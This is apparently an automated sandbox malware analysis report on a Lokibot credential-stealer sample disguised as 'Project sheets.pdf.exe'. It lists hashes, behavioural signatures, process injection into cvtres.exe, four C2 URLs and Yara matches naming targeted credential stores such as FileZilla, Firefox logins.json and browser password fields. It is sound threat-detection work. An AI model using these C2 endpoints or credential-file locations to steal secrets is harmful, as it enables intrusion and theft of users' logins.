Edit tour

Windows Analysis Report
Project sheets.pdf.exe

Overview

General Information

Sample Name:	Project sheets.pdf.exe
Analysis ID:	682148
MD5:	b9ff215d1d69d1a6d7568eecc3ecd245
SHA1:	6f17bbed238dc4571db8b43fad392c6ef3b88fa5
SHA256:	c06061604c0d1be02e69e00ada53ceb9e2d5ba9d47f93fc20cafa149513a12e1
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Lokibot

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Detected potential unwanted application

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Uses an obfuscated file name to hide its real file extension (double extension)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Project sheets.pdf.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\Project sheets.pdf.exe" MD5: B9FF215D1D69D1A6D7568EECC3ECD245)

cvtres.exe (PID: 5896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)

cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)

cvtres.exe (PID: 3896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17b3c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4efb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1373f:$des3: 68 03 66 00 00 0x17b3c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17c08:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1b920:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8ceb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1752f:$des3: 68 03 66 00 00 0x1b920:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1b9ec:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Project sheets.pdf.exe PID: 5648	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Project sheets.pdf.exe PID: 5648	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Project sheets.pdf.exe PID: 5648	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x46814:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xed874:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: cvtres.exe PID: 3896	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: cvtres.exe PID: 3896	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: cvtres.exe PID: 3896	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: cvtres.exe PID: 3896	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4141:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x13fd2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 56 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.cvtres.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.3.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.0.cvtres.exe.400000.3.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.0.cvtres.exe.400000.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.3.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.2.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x13e80:$s2: https:// 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
3.0.cvtres.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.2.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.cvtres.exe.400000.2.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.0.cvtres.exe.400000.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.cvtres.exe.400000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.cvtres.exe.400000.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.cvtres.exe.400000.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.2.cvtres.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cvtres.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.cvtres.exe.400000.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.cvtres.exe.400000.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.cvtres.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.cvtres.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.0.cvtres.exe.400000.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
